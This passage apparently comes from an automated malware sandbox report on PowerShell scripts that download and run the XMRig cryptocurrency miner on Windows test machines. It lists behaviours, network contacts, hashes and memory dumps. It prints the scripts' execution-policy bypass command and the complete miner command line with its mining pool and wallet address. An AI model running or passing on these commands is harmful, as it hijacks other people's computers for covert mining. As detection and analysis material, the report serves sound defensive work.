SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3452-46-0x000002D8B87C0000-0x000002D8B87E0000-memory.dmp

memory/3452-47-0x000002D8B8810000-0x000002D8B8830000-memory.dmp

memory/3452-48-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/2656-49-0x00007FFC80FE0000-0x00007FFC81AA2000-memory.dmp

memory/3452-51-0x000002D8B8830000-0x000002D8B8850000-memory.dmp

memory/3452-50-0x000002D8B8850000-0x000002D8B8870000-memory.dmp

memory/2656-53-0x00007FFC80FE3000-0x00007FFC80FE5000-memory.dmp

memory/3452-52-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-54-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-55-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-57-0x000002D8B8830000-0x000002D8B8850000-memory.dmp

memory/3452-56-0x000002D8B8850000-0x000002D8B8870000-memory.dmp

memory/3452-58-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-59-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-60-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-61-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-62-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-63-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-64-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-65-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-66-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-67-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-68-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-69-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-70-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-71-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-72-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-73-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-74-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-75-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-76-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-77-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-78-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-79-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-80-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-81-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-82-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-83-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-84-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-85-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-86-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-87-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-88-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-89-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-90-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-91-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-92-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-93-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-94-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-95-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-96-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-97-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-98-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-99-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-100-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-101-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-102-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-103-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-104-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-105-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-106-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-107-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-108-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-109-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-110-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-111-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-112-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-113-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-114-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-115-0x00007FF718720000-0x00007FF719353000-memory.dmp

memory/3452-116-0x00007FF718720000-0x00007FF719353000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:04

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 tcp

Files

memory/1656-0-0x00007FFA20DB3000-0x00007FFA20DB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_magvjwhg.hz3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1656-6-0x000001887EE00000-0x000001887EE22000-memory.dmp

memory/1656-10-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/1656-11-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/1656-12-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/1656-14-0x000001887F330000-0x000001887F342000-memory.dmp

memory/1656-15-0x000001887F320000-0x000001887F32A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2408-46-0x00000266CD260000-0x00000266CD280000-memory.dmp

memory/2408-47-0x00000266CD2A0000-0x00000266CD2C0000-memory.dmp

memory/2408-48-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/1656-49-0x00007FFA20DB3000-0x00007FFA20DB5000-memory.dmp

memory/1656-50-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/2408-53-0x00000266CD2C0000-0x00000266CD2E0000-memory.dmp

memory/2408-51-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-52-0x00000266CD2E0000-0x00000266CD300000-memory.dmp

memory/1656-54-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp

memory/2408-55-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-56-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-57-0x00000266CD2E0000-0x00000266CD300000-memory.dmp

memory/2408-58-0x00000266CD2C0000-0x00000266CD2E0000-memory.dmp

memory/2408-59-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-60-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-61-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-62-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-63-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-64-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-65-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-66-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-67-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-68-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-69-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-70-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-71-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-72-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-73-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-74-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-75-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-76-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-77-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-78-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-79-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-80-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-81-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-82-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-83-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-84-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-85-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-86-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-87-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-88-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-89-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-90-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-91-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-92-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-93-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-94-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-95-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-96-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-97-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-98-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-99-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-100-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-101-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-102-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-103-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-104-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-105-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-106-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-107-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-108-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-109-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-110-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-111-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-112-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-113-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-114-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-115-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-116-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

memory/2408-117-0x00007FF75BB90000-0x00007FF75C7C3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:25

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp

Files

memory/4532-2-0x00007FF8C1D43000-0x00007FF8C1D44000-memory.dmp

memory/4532-5-0x0000014B5C670000-0x0000014B5C692000-memory.dmp

memory/4532-6-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4532-9-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4532-10-0x0000014B74CB0000-0x0000014B74D26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_niydenne.gok.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4532-25-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4532-48-0x0000014B74E30000-0x0000014B74E42000-memory.dmp

memory/4532-61-0x0000014B5C6A0000-0x0000014B5C6AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4072-90-0x000001C22E0C0000-0x000001C22E0E0000-memory.dmp

memory/4532-91-0x00007FF8C1D43000-0x00007FF8C1D44000-memory.dmp

memory/4532-92-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4532-94-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4072-93-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-95-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-96-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-97-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-98-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-99-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-100-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-101-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-102-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-103-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-104-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-105-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-106-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-107-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-108-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-109-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-110-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-111-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-112-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-113-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-114-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-115-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-116-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-117-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-118-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-119-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-120-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-121-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-122-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-123-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-124-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-125-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-126-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-127-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-128-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-129-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-130-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-131-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-132-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-133-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-134-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-135-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-136-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-137-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-138-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-139-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-140-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-141-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-142-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-143-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-144-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-145-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-146-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-147-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-148-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-149-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-150-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-151-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-152-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-153-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-154-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-155-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-156-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:39

Platform

win10v2004-20240426-en

Max time kernel

1789s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
